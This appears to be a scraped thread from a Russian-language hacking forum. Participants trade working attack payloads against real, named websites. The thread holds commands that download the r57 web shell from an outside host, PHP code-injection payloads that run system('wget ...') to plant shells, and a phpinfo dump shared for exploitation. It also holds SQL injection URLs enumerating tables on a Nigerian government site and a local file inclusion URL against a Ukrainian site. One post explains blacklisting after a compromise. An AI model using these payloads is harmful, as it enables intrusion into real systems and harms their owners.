я попробывал 3 варианта wget http://www.shellhost.com/r57.txt -O 2.php curl http://www.shellhost.com/r57.txt > 2.php fetch http://www.shellhost.com/r57.txt; mv r57.txt 2.php но не один из них не подошел можешь помочь ?
${copy('откуда','куда')} ${file_put_contents('куда вставить','что вставить')} ${system('wget http://шелл')} //закачает шелл в pwd ${system('curl http://шелл > /куда/записать/шелл')} мануалы по фунцкиям найдешь на php.su
перепробывал все,всеровно не получается есть еще info.php Configuration PHP Core Directive Local Value Master Value allow_call_time_pass_reference On On allow_url_fopen On On always_populate_raw_post_data Off Off arg_separator.input & & arg_separator.output & & asp_tags Off Off auto_append_file no value no value auto_prepend_file no value no value browscap no value no value default_charset no value no value default_mimetype text/html text/html define_syslog_variables Off Off disable_classes no value no value disable_functions no value no value display_errors On On display_startup_errors On On doc_root no value no value docref_ext no value no value docref_root no value no value enable_dl On On error_append_string no value no value error_log no value no value error_prepend_string no value no value error_reporting 2039 2039 expose_php On On extension_dir /usr/local/lib/php/extensions/no-debug-non-zts-20020429 /usr/local/lib/php/extensions/no-debug-non-zts-20020429 file_uploads On On gpc_order GPC GPC highlight.bg #FFFFFF #FFFFFF highlight.comment #FF8000 #FF8000 highlight.default #0000BB #0000BB highlight.html #000000 #000000 highlight.keyword #007700 #007700 highlight.string #DD0000 #DD0000 html_errors On On ignore_repeated_errors Off Off ignore_repeated_source Off Off ignore_user_abort Off Off implicit_flush Off Off include_path .:/usr/local/lib/php .:/usr/local/lib/php log_errors On On log_errors_max_len 1024 1024 magic_quotes_gpc Off Off magic_quotes_runtime Off Off magic_quotes_sybase Off Off max_execution_time 30 30 max_input_time 60 60 open_basedir no value no value output_buffering 4096 4096 output_handler no value no value post_max_size 30M 30M precision 14 14 register_argc_argv Off Off register_globals On On report_memleaks On On safe_mode Off Off safe_mode_exec_dir no value no value safe_mode_gid Off Off safe_mode_include_dir no value no value sendmail_from [email protected] [email protected] sendmail_path /usr/sbin/sendmail -t -i /usr/sbin/sendmail -t -i serialize_precision 100 100 short_open_tag On On SMTP localhost localhost smtp_port 25 25 sql.safe_mode Off Off track_errors Off Off unserialize_callback_func no value no value upload_max_filesize 20M 20M upload_tmp_dir no value no value user_dir no value no value variables_order GPCS GPCS xmlrpc_error_number 0 0 xmlrpc_errors Off Off y2k_compliance On On
Kasper1898 из за ваших кривых рук мы не будем флудить тут до утра, почитайте учебники, никто не должен за вас что то сделать, здесь дают лишь советы.
Тогда я пишу правильно ) Это мой сайт... так что вреда ему я никак не желаю а вот узнать сможет ли мне кто либо навредить - хотелось бы знать
тогда вам сюда http://forum.antichat.ru/forum110.html спросите яндексу, оно в блеклисте яндекса, по "Malware Warning"
у тебя или стоит, или стоял фрейм или ещё какая херня, через которую распространялся троян. Домен, откуда распространялся трой попал в блек яши, потом за ним и твой сайт попал к нему в блек, через некоторое время (пол часа-час) твой сайт попал в блэк у оперы. После того, как ты закроешь дырки на сайте, убьёшь шеллы, сменишь пароли (чтобы те по новой не поставили фрейм) пройдёт ещё около двух суток прежде чем сайт твой выйдет из блэков. Даже, если в текущий момент в коде страниц ты не можешь найти такого фрейма, то это не значит, что как только вылезешь из блэка, его не поставят снова (те кто твой сайт ломанули). Яша на спам на сайте не ругается таким образом.
http://www.nwri.gov.ng/about/board_Detail.asp?id=52+order+by+14(error) http://www.nwri.gov.ng/about/board_Detail.asp?id=52+order+by+13(no error) But union select is not working and "user" table is available.
http://www.nwri.gov.ng/about/board_Detail.asp?id=52+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+msysaccessobjects read some manuals =\
This is MsAccess Injects Code: _ttp://www.nwri.gov.ng/about/board_Detail.asp?id=52+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+clients _ttp://www.nwri.gov.ng/about/board_Detail.asp?id=52+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+clients.clin _ttp://www.nwri.gov.ng/about/board_Detail.asp?id=52+and+(select+count(name)+from+clients)>0+and+1=1 Datas Code: path = c:\windows\system32\inetsrv\ Table = Clients Fields = id, name, etc...
есть LRI вида http://www.svaltera.ua/index.php?inc=../../../../../../../../proc/self/fd/2 можно как то использовать ?